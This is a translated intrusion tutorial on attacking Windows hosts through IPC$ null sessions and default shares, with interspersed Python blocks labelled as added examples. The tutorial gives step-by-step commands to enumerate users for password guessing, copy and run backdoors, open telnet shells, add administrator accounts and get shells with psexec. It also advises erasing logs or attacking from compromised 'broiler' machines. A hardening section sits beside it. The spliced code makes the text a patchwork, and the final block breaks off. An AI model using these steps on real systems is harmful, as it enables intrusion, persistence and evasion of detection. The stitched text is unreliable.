Basic introduction
There are many articles about ipc$ intrusion on the Internet, and the attack steps have long since settled into a fixed pattern, so nobody wants to dig into something that has become so routine. Having said that, I think these articles are not explained in detail, and some of their content is even wrong, with the result that questions about ipc$ account for almost half of the discussion on the major security forums, and the same questions are asked again and again. This has seriously affected the quality of the forums and the efficiency of learning, so I have put together this article, hoping to explain the ipc$ topic as clearly as possible.
Note: The situations discussed in this article assume a Windows NT/2000/XP/Win 7 environment; Win98 is not covered.
A null connection is an IPC connection made without a password or user name. Under Windows it is made with the net command. The general form for establishing a connection is: net use \\IP address "password" /user:"user name". To prohibit null connections: Start - Settings - Control Panel - Administrative Tools - Services, then stop the Server service.
Function
IPC$ (Internet Process Connection) is a resource that shares "named pipes". It is a named pipe opened for inter-process communication. By providing a trusted user name and password, the two ends of the connection can establish a secure channel and exchange encrypted data over it, thereby accessing the remote computer. IPC$ is a new feature of NT/2000. It has the property that only one connection can be established between two IPs at the same time. While NT/2000 provides the ipc$ function, it also enables the default shares when the system is first installed, that is, every logical drive (c$, d$, e$ ...) and the system directory winnt or windows (admin$). Microsoft's original intention with all of this was to make administration easier, but, intentionally or not, it also reduces system security.
Others
We often hear people talk about the "ipc$ vulnerability". In fact, ipc$ is not a vulnerability in the true sense; I think that when people say this they must be referring to the "backdoor" that Microsoft installed itself: the null session. So what is a null session?
Empty session
Establishing
Before introducing an empty session, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge-response protocol is used to establish a session with a remote machine. A successful session becomes a secure tunnel through which the two parties communicate. The general sequence is as follows:
1) The session requester (client) sends a packet to the session receiver (server) requesting the establishment of a secure tunnel;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number generated by the server, scrambles it with the password of the account it is trying to establish the session with, and returns the result to the server (the response);
4) After the server receives the response, it passes it to the Local Security Authority (LSA). The LSA verifies the response using the user's correct password to confirm the requester's identity. If the requester's account is a local account of the server, the verification happens locally; if it is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the session is terminated.
The above is a general process of establishing a secure session, but what about an empty session?
A null session is a session established with the server without trust (that is, no user name and password are provided). According to the Win2000 access control model, establishing a null session also requires a token, but since no user information is authenticated while the session is set up, this token contains no user information. Consequently the system cannot send encrypted information over this session. This does not mean, however, that the null-session token has no security identifier (SID, which identifies the user and the groups it belongs to). For a null session, the SID the LSA places in the token is S-1-5-7, the SID of the null session, and the user name is ANONYMOUS LOGON (this user name can be seen in the user list but cannot be found in the SAM database; it is a built-in account of the system). This access token contains the following impersonated groups:
Everyone
Network
Under the restrictions of the security policy, this null session is authorized to access everything that the above two groups have access to. So what can you do with a null session?
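To make the four steps and the null-session token concrete, here is a simplified model of that exchange as an added example (not code from the article). HMAC-SHA256 stands in for the password scrambling, so the real LM/NT hash and DES construction are not reproduced here (an assumption), and the account names and SIDs are constructed.

```python
"""Simplified model of NT session setup: challenge, client response, LSA
verification, and the anonymous (null-session) token. Hypothetical code; the
Windows construction (NT hash, DES) is replaced by HMAC-SHA256."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

NULL_SESSION_SID = "S-1-5-7"                   # SID the LSA places in a null-session token
NULL_SESSION_USER = "ANONYMOUS LOGON"
NULL_SESSION_GROUPS = ("Everyone", "Network")  # the two impersonated groups


@dataclass(frozen=True)
class Token:
    user: str
    sid: str
    groups: Tuple[str, ...]
    authenticated: bool


def password_key(password: str) -> bytes:
    # Stand-in for the stored password hash (assumption: SHA-256 of the UTF-16LE
    # password; Windows uses MD4 for the NT hash, not reproduced here).
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def client_response(password: str, challenge: bytes) -> bytes:
    # Step 3: the client "scrambles" the challenge with the account password.
    return hmac.new(password_key(password), challenge, hashlib.sha256).digest()


class Server:
    """Session receiver plus its LSA (constructed account database)."""

    def __init__(self, accounts: Dict[str, Tuple[str, str]]):
        # accounts: user -> (password, SID); constructed sample data
        self._keys = {u: password_key(pw) for u, (pw, _) in accounts.items()}
        self._sids = {u: sid for u, (_, sid) in accounts.items()}
        self._pending = set()

    def challenge(self) -> bytes:
        # Step 2: a random 64-bit number sent back to the client.
        c = secrets.token_bytes(8)
        self._pending.add(c)
        return c

    def verify(self, user: Optional[str], challenge: bytes,
               response: bytes) -> Optional[Token]:
        # Step 4: the LSA recomputes the response from the stored key. Each
        # challenge may be answered only once, so a captured response cannot be replayed.
        if challenge not in self._pending:
            return None
        self._pending.discard(challenge)
        if user is None:
            # Null session: no credentials were presented, nothing is verified,
            # and the token carries no user information.
            return Token(NULL_SESSION_USER, NULL_SESSION_SID, NULL_SESSION_GROUPS, False)
        key = self._keys.get(user)
        if key is None:
            return None
        expected = hmac.new(key, challenge, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, response):
            return None
        return Token(user, self._sids[user], ("Everyone", "Network", "Users"), True)


def establish_session(server: Server, user: Optional[str],
                      password: Optional[str]) -> Optional[Token]:
    # Step 1: the client requests a session; a null session sends no credentials.
    challenge = server.challenge()
    if user is None:
        return server.verify(None, challenge, b"")
    return server.verify(user, challenge, client_response(password or "", challenge))


def has_access(token: Token, allowed_groups) -> bool:
    # Access check: the token may use whatever any of its groups is granted. This
    # is why a null session still reaches everything granted to Everyone or Network.
    return any(g in allowed_groups for g in token.groups)
```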
Application
On NT, under the default security settings, a null connection can list the users and shares on the target host, access shares granted to Everyone, and read a small part of the registry; there is not much value in it. It is even less useful on 2000, because in Windows 2000 and later only Administrators and Backup Operators may access the registry from the network by default, and it is inconvenient to carry out and requires tools.
From this it appears that an untrusted session is not very useful, but viewed as part of a complete ipc$ intrusion the null session is an indispensable stepping stone, because from it we can obtain the user list, and most weak-password scanners use this user list to guess passwords. Successfully exporting the user list greatly increases the success rate of guessing. That alone is enough to explain the security risk of the null session, so it is wrong to say that null sessions are useless. The following are some commands that can be used in a null session:
1 First, establish a null session (of course, this requires the target to have ipc$ open)
Command: net use \\ip\ipc$ "" /user:"" (Note: the first "" is the empty password, and the "" after /user: is the empty user name)
Note: The command above contains four spaces: one between net and use, one after use, and one on each side of the password.
2 View the shared resources of the remote host
Command: net view \\ip
Explanation: Once a null connection is established, this command shows the shared resources of the remote host. If shares are enabled you get a result like the one below, but this command cannot display the default shares.
Shared resources at \\*.*.*.*
Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
SYSVOL       Disk             Logon server share
The command completed successfully.
3 View the current time of the remote host
Command: net time \\ip
Explanation: Use this command to get the current time of a remote host.
4 Get a list of NetBIOS user names of the remote host (you need to open your own NBT)
Command: nbtstat -A ip
Use this command to get the NetBIOS user name list of the remote host; it returns the following result:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name               Type         Status
---------------------------------------------
SERVER         <00>  UNIQUE      Registered
OYAMANISHI-H   <00>  GROUP       Registered
OYAMANISHI-H   <1C>  GROUP       Registered
SERVER         <20>  UNIQUE      Registered
OYAMANISHI-H   <1B>  UNIQUE      Registered
OYAMANISHI-H   <1E>  GROUP       Registered
SERVER         <03>  UNIQUE      Registered
OYAMANISHI-H   <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
INet~Services  <1C>  GROUP       Registered
IS~SERVER......<00>  UNIQUE      Registered
MAC Address = 00-50-8B-9A-2D-37
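As an added example (not from the article), a parser for the nbtstat name table shown above that turns it into a host profile an administrator can use to see what a host advertises. The suffix meanings are the standard NetBIOS service codes (assumption: Microsoft's well-known assignments), and the sample table is the one above with a constructed address and its stray spaces kept.

```python
"""Parse `nbtstat -A` output into the registered names and a host profile."""
import re
from typing import Dict, List, Optional

# Well-known NetBIOS suffix meanings (assumption: standard assignments).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger service",
    ("20", "UNIQUE"): "Server service (SMB shares, including IPC$, are offered)",
    ("1B", "UNIQUE"): "Domain master browser",
    ("1C", "GROUP"): "Domain controllers",
    ("1D", "UNIQUE"): "Master browser",
    ("1E", "GROUP"): "Browser service elections",
    ("01", "GROUP"): "Master browser (__MSBROWSE__)",
}

# One table row: name, <hex suffix> (possibly with stray spaces), type, status.
ROW_RE = re.compile(r"^\s*(\S.*?)\s*<\s*([0-9A-Fa-f]{2})\s*>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*(.+)$")

# Constructed sample: the article's table with a documentation address.
SAMPLE_NBTSTAT = """\
Node IpAddress: [192.0.2.5] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
------------------------------------ ---------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H < 1C > GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services < 1C > GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00- 50-8B -9A -2D-37
"""


def parse_name_table(text: str) -> Dict[str, object]:
    """Return the registered names plus a profile derived from the suffixes."""
    rows: List[Dict[str, str]] = []
    mac: Optional[str] = None
    for line in text.splitlines():
        m = MAC_RE.search(line)
        if m:
            mac = m.group(1).replace(" ", "").upper()   # repair the spaced-out MAC
            continue
        m = ROW_RE.match(line)
        if not m:
            continue                                     # header / separator lines
        name, suffix, ntype, status = m.groups()
        suffix = suffix.upper()
        rows.append({"name": name, "suffix": suffix, "type": ntype, "status": status,
                     "meaning": SUFFIX_MEANING.get((suffix, ntype), "unknown")})

    def first(suffix: str, ntype: str) -> Optional[str]:
        return next((r["name"] for r in rows
                     if r["suffix"] == suffix and r["type"] == ntype), None)

    return {
        "names": rows,
        "mac": mac,
        "computer_name": first("00", "UNIQUE"),
        "domain": first("00", "GROUP"),
        # <20> means the Server service runs, i.e. IPC$ and the shares are reachable
        "server_service": first("20", "UNIQUE") is not None,
        "domain_controller": first("1C", "GROUP") is not None,
        "master_browser": first("1D", "UNIQUE") is not None,
    }
```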
The above is what is usually done with null sessions. It seems we can get quite a lot, but note that establishing an IPC$ connection leaves a record in the Event Log, whether or not the logon succeeds. Now let's look at the ports ipc$ uses.
About operation
Port used
First, some basic background:
1 SMB (Server Message Block): a Windows protocol family used for file and printer sharing services;
2 NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to carry NetBIOS networking over TCP/IP;
3 In Windows NT, SMB is implemented on top of NBT, that is, over port 139 (TCP); in Windows 2000, besides running over NBT, SMB can also run directly over port 445.
With this background, we can go on to discuss port selection when accessing network shares:
For a win2000 client (initiator):
1 If NBT is allowed when connecting to the server, the client tries ports 139 and 445 at the same time. If port 445 responds, it sends a RST packet to port 139 to close that connection and continues the session on port 445. If port 445 does not respond, port 139 is used. If neither port responds, the session fails;
2 If NBT is disabled when connecting to the server, the client only tries port 445; if port 445 does not respond, the session fails.
For a win2000 server (responder):
1 If NBT is allowed, UDP ports 137 and 138 and TCP ports 139 and 445 are opened (LISTENING);
2 If NBT is disabled, only port 445 is open.
The port selection of the ipc$ session we establish follows the same rules. Obviously, if the remote server is listening on neither port 139 nor port 445, the ipc$ session cannot be established.
Reasons for failure
The following are some common reasons for ipc$ connection failure:
1 IPC connection is a feature unique to Windows NT and later systems. Because it relies on many Windows NT DLL functions, it cannot run on Windows 9x/Me; in other words, only NT/2000/XP can establish ipc$ connections with each other, and 98/Me cannot;
2 To establish an ipc$ connection successfully, the responder must have ipc$ sharing enabled; even for a null connection, if the responder has turned off ipc$ sharing, the connection cannot be established;
3 The initiator has not started the Lanmanworkstation service (display name: Workstation): it provides network connections and communication; without it the initiator cannot initiate a connection request;
4 The responder has not started the Lanmanserver service (display name: Server): it provides RPC support and file, print and named-pipe sharing. ipc$ depends on this service; without it, the host cannot respond to the initiator's connection request, although it can still initiate ipc$ connections itself;
5 The responder has not started NetLogon, which supports pass-through authentication of computer accounts on the network (but this does not seem to matter much);
6 The responder's ports 139 and 445 are not listening or are blocked by a firewall;
7 The initiator has not opened ports 139 and 445;
8 The user name or password is wrong: in this case the system gives an error message similar to "Unable to update the password" (obviously a null session is not subject to this error);
9 Command typing error: there may be too many or too few spaces. When the user name and password contain no spaces, the double quotation marks on either side can be omitted; if the password is empty, just enter the two quotation marks "";
10 If the other side restarts the computer after the connection has been established, the ipc$ connection is automatically dropped and has to be re-established.
In addition, you can analyze the cause from the returned error number:
Error 5, access denied: it is very likely that the user you are using is not an administrator;
Error 51, Windows cannot find the network path: there is a problem with the network;
Error 53, the network path cannot be found: the IP address is wrong; the target is not switched on; the target's lanmanserver service is not started; the target has a firewall (port filtering);
Error 67, the network name cannot be found: your lanmanworkstation service is not started, or the target has deleted ipc$;
Error 1219, the supplied credentials conflict with an existing set of credentials: you have already established an ipc$ connection with the other side; delete it and reconnect;
Error 1326, unknown user name or bad password: the reason is obvious;
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's NetLogon service is not started;
Error 2242, the user's password has expired: the target has an account policy that enforces periodic password changes.
Copy files
Although some friends have successfully established an ipc$ connection, they run into all sorts of trouble when copying and the copy fails. So what are the common reasons for copy failure?
1. The other side has no shared folder open
This is the most common error, accounting for more than 50% of cases. After the ipc$ connection is established, many friends copy blindly without even knowing whether the other side has a shared folder, and are very frustrated when the copy fails. I therefore suggest using net view \\IP to check whether the shared folder you want to copy to exists before copying (checking with a tool is even better); don't assume that a shared folder must exist just because an ipc$ connection can be established.
2. Failed to copy to the default share
Everyone makes this kind of error. There are two aspects to it:
1) Wrongly thinking that a host with which an ipc$ connection can be established must have the default shares enabled, and so copying files to default shares such as c$, d$ and admin$ immediately after the connection is established; as soon as the other side has the default shares disabled, the copy fails. A successful ipc$ connection only shows that the other side has the ipc$ share open; it does not mean the default shares exist. The ipc$ share and the default shares are two different things: the ipc$ share is a named pipe, not an actual folder, while the default shares are real shared folders;
2) Because net view \\IP cannot display the default shares (their names end in $), we cannot use this command to determine whether the other side has the default shares enabled. So if the other side has them disabled, every operation aimed at the default shares will fail. (Most scanners, however, can detect the default shared directories while scanning for weak passwords, which avoids this kind of error.)
Key point: please distinguish between the ipc share, the default shares and ordinary shares: the ipc share is a pipe, not an actual shared folder; the default shares are the folders shared by default at installation; ordinary shares are shared folders that we open ourselves and can set permissions on.
3. Insufficient user permissions, covering four situations:
1) When a null connection copies to any share (default or ordinary), the permissions are insufficient;
2) When copying to a default share, in Win2000 Pro only members of the Administrators and Backup Operators groups can access these shared directories; in Win2000 Server, the Server Operators group can also access them;
3) When copying to an ordinary share, you must have the corresponding permission (that is, the access permission set in advance by the other side's administrator);
4) The other side can prohibit external access to the share through firewall or security-software settings;
Note:
A. Don't assume that "administrator" must have administrator rights; the administrator's name can be changed.
B. The administrator can access the default shared folders, but may not be able to access ordinary shared folders, because the administrator can set access permissions on ordinary shares. If the administrator set the access permission on the D drive so that only a user named xinxin has full access to that folder, then even with administrator rights you still cannot access the D drive. Interestingly, though, if the other side has the default share D$ enabled at the same time, you can access D$ and thus bypass the permission restriction; interested friends can test this themselves.
4. Killed by a firewall or on a LAN
There is another situation: your copy may have succeeded, but when the file is run remotely it is killed by a firewall, so the file cannot be found; or you copied the Trojan to a host on a LAN, so the connection fails (this does not happen with a reverse-connecting Trojan). If you did not think of this, you would assume there was a problem with the copy, when in fact the copy succeeded and the problem occurred at run time.
Command restrictions
I originally wanted to discuss the reasons why remote execution with at fails, but the success rate of at is not high and it has many problems, so I will not cover it here (the more it is mentioned, the more people use it). Instead I recommend using psexec.exe to run programs remotely. Suppose you want the remote machine to execute the local file c:\xinxin.exe, the administrator is administrator and the password is 1234; enter the following command:
psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe
If an ipc connection has already been established, the -u and -p parameters are not needed; psexec.exe automatically copies the file to the remote machine and runs it.
I did not want to discuss ipc$ on XP here and meant to cover it separately, but I see more and more friends anxiously asking why most operations are so hard to get to succeed on XP, so I will mention it briefly. In XP's default security options, any remote access is granted only Guest permissions. That is, even if you use an administrator account and password, the permissions you get are only those of Guest, so most operations fail for lack of permissions, and so far there is no good way around this limitation. So if you really have obtained an XP administrator password, I suggest you avoid the ipc pipe as much as possible.
Share
The target's ipc$ cannot be opened easily, otherwise the world would be in chaos. You need a shell with administrator permissions, such as telnet, a Trojan or cmd redirection, and then execute under that shell:
net share ipc$
to open the target's ipc$ share;
net share ipc$ /del
to close the target's ipc$ share. If you want to open a shared folder, you can use:
net share xinxin=c:\
This shares its C drive as a share named xinxin. (I have found that many people mistakenly believe that the command to open a shared folder is net share c$, and pass this on to novices, which is really a misunderstanding.) Again, these operations are only possible under a shell.
Completing the command
I have seen many tutorials that are very inaccurate: some commands that require a shell are simply presented as being executed under the ipc$ connection, which is misleading. So let me summarize the commands that must be completed in a shell:
1 Creating a user on the remote host, activating a user, changing a user's password and adding a user to the Administrators group must be done in the shell;
2 Opening the remote host's ipc$ share, its default shares and ordinary shares must be done in the shell;
3 Starting/stopping services on the remote host must be done in the shell;
4 Starting/killing processes on the remote host must also be done in the shell (except with tools such as pskill).
Commands that may be used in the invasion
For completeness, I have listed some commands commonly used in ipc$ intrusions; if you already know them, skip this part. Please note whether each command applies locally or remotely: the ones that apply only locally can be run against the remote host only after you obtain a shell on it (such as cmd or telnet).
1 Command to establish/delete ipc$ connection
1) Establish a null connection:
net use \\127.0.0.1\ipc$ "" /user:""
2) Establish a non-null connection:
net use \\127.0.0.1\ipc$ "password" /user:"user name"
3) Delete the connection:
net use \\127.0.0.1\ipc$ /del
2 Operation commands for remote host in ipc$ connection
1) View the shared resources of the remote host (the default share is not visible):
net view \\127.0.0.1
2) View the current time of the remote host:
net time \\127.0.0.1
3) Get the netbios username list of the remote host:
nbtstat -A 127.0.0.1
4) Map/delete a remote share:
net use z: \\127.0.0.1\c
This command maps the shared resource named c to the local z: drive.
net use z: /del
Deletes the mapped z: drive; other drive letters work the same way.
5) Copy files to the remote host:
copy path\file name \\IP\share name, for example:
copy c:\xinxin.exe \\127.0.0.1\c$ copies xinxin.exe from the local c drive to the other side's c drive.
Of course, you can also copy files from the remote host to your own machine:
copy \\127.0.0.1\c$\xinxin.exe c:\
6) Add a scheduled task remotely:
at \\IP time program name, for example:
at \\127.0.0.1 11:00 xinxin.exe
Note: use the 24-hour clock for the time; if the program you intend to run is on the system's default search path (such as system32\), you do not need to add the path, otherwise you must give the full path. The at command has since been deprecated; use the schtasks command instead (schtasks /? shows its usage).
3 Local commands
1) View the shared resources of the local host (you can see the local default share)
net share
2) Get the user list of the local host
net user
3) Display the account information of a local user
net user account name
4) Display the services currently started on the local host
net start
5) Start/stop local services
net start service name
net stop service name
6) Add an account locally
net user account name password /add
7) Activate a disabled user
net user account name /active:yes
8) Add to the Administrators group
net localgroup administrators account name /add
Obviously, although these are all local commands, if you enter them in a shell on the remote host, for example after a successful telnet, they act on the remote host.
4 Other commands
1) telnet
telnet IP port
telnet 127.0.0.1 23
2) Use opentelnet.exe to open the remote host's telnet
OpenTelnet.exe \\ip administrator account password NTLM authentication method port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
However, this small tool has four requirements:
1) The target has ipc$ sharing enabled
2) You must have an administrator account and password
3) The target has the RemoteRegistry service running, so that the NTLM authentication setting can be changed
4) It only works on Win2K/XP
3) Use psexec.exe to obtain a shell in one step; ipc pipe support is required
psexec.exe \\IP -u administrator account -p password cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
Comparing the past and present ipc$ intrusion
Since this is a comparison, I will first write out the old ipc$ intrusion steps, which are all quite classic:
[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:administrator
\\ Establish a connection with the empty password found by scanning
[2]
c:\>net view \\127.0.0.1
\\ View remote shared resources
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\ Copy the one-time backdoor srv.exe to the other side's system folder, provided admin$ is enabled
[4]
C:\>net time \\127.0.0.1
\\ View the current time of the remote host
[5]
C:\>at \\127.0.0.1 time srv.exe
\\ Run srv.exe remotely with the at command; this requires the other side to have the 'Task Scheduler' service running
[6]
C:\>net time \\127.0.0.1
\\ Check the time again to estimate whether srv.exe is already running; this step can be omitted
[7]
C:\>telnet 127.0.0.1 99
\\ In a new window, telnet to 127.0.0.1 to get a shell (don't know what a shell is? Just think of it as control of the remote machine, operated like DOS); port 99 is the one-time backdoor port opened by srv.exe
[8]
C:\WINNT\system32>net start telnet
\\ In the shell we just logged into, start the remote machine's telnet service. After all, srv.exe is a one-time backdoor; we need a long-term backdoor for future access. If the other side's telnet is already running, this step can be omitted
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\ In the original window, upload ntlm.exe, which is used to change the telnet authentication
[10]
C:\WINNT\system32>ntlm.exe
\\ Run ntlm.exe in the shell window, and from now on you can telnet to this host without obstruction
[11]
C:\>telnet 127.0.0.1 23
\\ In a new window, telnet to 127.0.0.1 (port 23 can be omitted), and we have a long-term backdoor
[12]
C:\WINNT\system32>net user account name password /add
C:\WINNT\system32>net user guest /active:yes
C:\WINNT\system32>net localgroup administrators account name /add
\\ After telnetting in, you can create a new account, activate guest, add an account to the Administrators group, and so on
Okay, I seem to have gone back to the ipc$ of 2 or 3 years ago, when everyone used ipc$ this way. With the emergence of new tools, however, some of the tools and commands above are no longer commonly used, so let's look at an efficient and simple ipc$ intrusion.
[1] psexec.exe \\IP -u administrator account -p password cmd
\\ With this tool we can get a shell in one step
OpenTelnet.exe \\server administrator account password NTLM authentication method port
\\ Use it to conveniently change the telnet authentication method and port, which makes logging in convenient
[2] There is no second step. Once you have the shell in one step, you can do anything: use winshell to install a backdoor, use ca for cloning, use 3389.vbe to open the terminal, use win2kpass to record passwords. In short, there are plenty of good tools; it's up to you, and I won't say more.
Prevent intrusion
1 Prohibit enumeration through null connections (this does not prevent null connections from being established)
Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] and change the DWORD value RestrictAnonymous to 1.
If set to 1, an anonymous user can still connect to the IPC$ share but cannot use this connection to enumerate SAM accounts and share information; the value 2 was added in Windows 2000, and with it users who have not been granted anonymous access cannot make ipc$ null connections at all. The recommended setting is 1. If the key above does not exist, create it and set the value. If you find editing the registry troublesome, you can set this in Local Security Settings: Local Security Settings - Local Policies - Security Options - 'Additional restrictions for anonymous connections'.
2 Prohibit the default shares
1) View local shared resources
Run - cmd - enter net share
2) Delete the shares (the default shares come back after a restart)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are e, f, ... continue deleting)
3) Stop the Server service
net stop server /y (the Server service starts again after a restart)
4) Prohibit automatic creation of the default shares (this does not close the ipc$ share)
Run - regedit
Server version and Pro version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the value AutoShareServer (DWORD) to 00000000.
These two values do not exist on the host by default; you need to add them manually. After the change, restart the machine for the settings to take effect.
3 Turn off the service that ipc$ and the default shares depend on: the Server service
If you really want to turn off the ipc$ share, disable the Server service:
Control Panel - Administrative Tools - Services - find the Server service (right click) - Properties - General - Startup type - select Disabled. There may then be a prompt saying that service XXX will also be stopped and asking whether to continue; this is because some minor services depend on the Server service, so don't worry about it.
4 Block ports 139 and 445
Because ipc$ cannot be established without those two ports, blocking ports 139 and 445 also prevents ipc$ intrusion.
1) Port 139 can be blocked by disabling NBT
Local Area Connection - TCP/IP properties - Advanced - WINS - select the option 'Disable NetBIOS over TCP/IP'
2) Port 445 can be blocked by modifying the registry
Add a value:
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
Restart the machine after the change.
Note: if the above two ports are blocked, you will not be able to use ipc$ against others either.
3) Install a firewall for port filtering
5 Set complex passwords to prevent password brute-forcing through ipc$. I think this is the best method: raising security awareness is much safer than relying on patching.
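To check the registry settings recommended in this section on a machine, here is an added example (not from the article) that audits the text output of reg query, so it can run on an exported file. It assumes the key paths above live under CurrentControlSet and adds AutoShareWks, the Professional-edition counterpart of AutoShareServer, as a known value name; the two exports are constructed.

```python
"""Audit reg query output for the ipc$ hardening values from the article."""
import re
from typing import Dict, List, Optional, Tuple

LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
LANMAN = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
NETBT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters"

# (key, value name, hardened value, what an absent value means). AutoShareServer
# applies to Server editions and AutoShareWks to Pro; set the one for your edition.
CHECKS: List[Tuple[str, str, int, str]] = [
    (LSA, "RestrictAnonymous", 1, "absent = 0: null sessions may enumerate accounts and shares"),
    (LANMAN, "AutoShareServer", 0, "absent = 1: C$/ADMIN$ recreated at every boot (Server)"),
    (LANMAN, "AutoShareWks", 0, "absent = 1: C$/ADMIN$ recreated at every boot (Pro)"),
    (NETBT, "SMBDeviceEnabled", 0, "absent = 1: SMB listens on TCP 445"),
]

# A reg query value line: "    Name    REG_DWORD    0x1"
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")

# Constructed exports: the weak state and the corrected one.
WEAK_EXPORT = rf"""
{LSA}
    LmCompatibilityLevel    REG_DWORD    0x2
    RestrictAnonymous    REG_DWORD    0x0

{LANMAN}
    Size    REG_DWORD    0x3

{NETBT}
    SMBDeviceEnabled    REG_DWORD    0x1
"""

HARDENED_EXPORT = rf"""
{LSA}
    RestrictAnonymous    REG_DWORD    0x1

{LANMAN}
    AutoShareServer    REG_DWORD    0x0
    AutoShareWks    REG_DWORD    0x0

{NETBT}
    SMBDeviceEnabled    REG_DWORD    0x0
"""


def parse_reg_query(text: str) -> Dict[str, Dict[str, int]]:
    """Map key path -> {value name: integer} for the REG_DWORD values."""
    keys: Dict[str, Dict[str, int]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None and m.group(2) == "REG_DWORD":
            keys[current][m.group(1)] = int(m.group(3).strip(), 16)
    return keys


def audit(text: str) -> List[str]:
    """One finding per setting that is absent or not at the hardened value."""
    keys = parse_reg_query(text)
    findings: List[str] = []
    for key, name, wanted, absent_note in CHECKS:
        actual = keys.get(key, {}).get(name)
        if actual is None:
            findings.append(f"{name} missing under {key.rsplit(chr(92), 1)[-1]} ({absent_note})")
        elif actual != wanted:
            findings.append(f"{name} = {actual}, expected {wanted}")
    return findings
```

Note that SMBDeviceEnabled = 0 disables direct SMB on 445 for legitimate use as well, as the section above points out.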
Pipe
The ipc pipe was originally designed by Microsoft to make remote administration easier, but in the eyes of an intruder a host with the ipc pipe open looks easier to compromise. Through the ipc pipe we can remotely call some system functions (mostly through tools, and the corresponding permissions are required), which is often the key to the success or failure of an intrusion. Even leaving that aside and considering only file transfer, the ipc channel has given intruders great support and has even become the most important means of transfer, which is why you always see friends on the major forums crying for help because they cannot open the target's ipc pipe. Of course, we cannot ignore the important role permissions play in the ipc pipe. You must have tasted the awkwardness of a null session: without permissions we cannot do anything even with the channel open. But once an intruder gains administrator permissions, the double-edged sword of the ipc pipe shows its sinister side.
Featured Questions and Answers
A lot of theory was covered above, but in practice you will run into all kinds of problems, so to be of the greatest help I have compiled some representative questions and answers from the major security forums. Some of the answers are mine and some are forum replies. If you have questions, come and discuss them with me.
1. When an ipc$ intrusion is carried out, a record will be left in the server. Is there any way to prevent the server from discovering it?
Answer: It is certain to leave a record. You can delete it with the clear log program after you leave, or use a broiler to invade.
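Taking the defender's side of this answer, here is an added example (not from the article) that runs detection logic over constructed Security-log events for the activity described in this article: null-session logons (SID S-1-5-7, ANONYMOUS LOGON), anonymous IPC$ access, repeated failed network logons from one source, and remote use of the default shares. Event IDs 4624, 4625 and 5140 are the standard Windows ones; the JSON-lines export format and its field names are assumptions.

```python
"""Detection pass over constructed Windows Security events exported as JSON lines."""
import json
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample export; IPs are documentation addresses, not real hosts.
SAMPLE_EVENTS = r"""
{"EventID":4624,"LogonType":3,"TargetUserName":"ANONYMOUS LOGON","TargetUserSid":"S-1-5-7","IpAddress":"192.0.2.10"}
{"EventID":5140,"ShareName":"\\\\*\\IPC$","SubjectUserName":"ANONYMOUS LOGON","IpAddress":"192.0.2.10"}
{"EventID":4625,"LogonType":3,"TargetUserName":"administrator","Status":"0xC000006D","IpAddress":"192.0.2.10"}
{"EventID":4625,"LogonType":3,"TargetUserName":"administrator","Status":"0xC000006D","IpAddress":"192.0.2.10"}
{"EventID":4625,"LogonType":3,"TargetUserName":"administrator","Status":"0xC000006D","IpAddress":"192.0.2.10"}
{"EventID":4625,"LogonType":3,"TargetUserName":"xinxin","Status":"0xC000006D","IpAddress":"192.0.2.10"}
{"EventID":4624,"LogonType":3,"TargetUserName":"administrator","TargetUserSid":"S-1-5-21-100-200-300-500","IpAddress":"192.0.2.10"}
{"EventID":5140,"ShareName":"\\\\*\\ADMIN$","SubjectUserName":"administrator","IpAddress":"192.0.2.10"}
{"EventID":4624,"LogonType":3,"TargetUserName":"xinxin","TargetUserSid":"S-1-5-21-100-200-300-1001","IpAddress":"192.0.2.20"}
{"EventID":5140,"ShareName":"\\\\*\\NETLOGON","SubjectUserName":"xinxin","IpAddress":"192.0.2.20"}
"""

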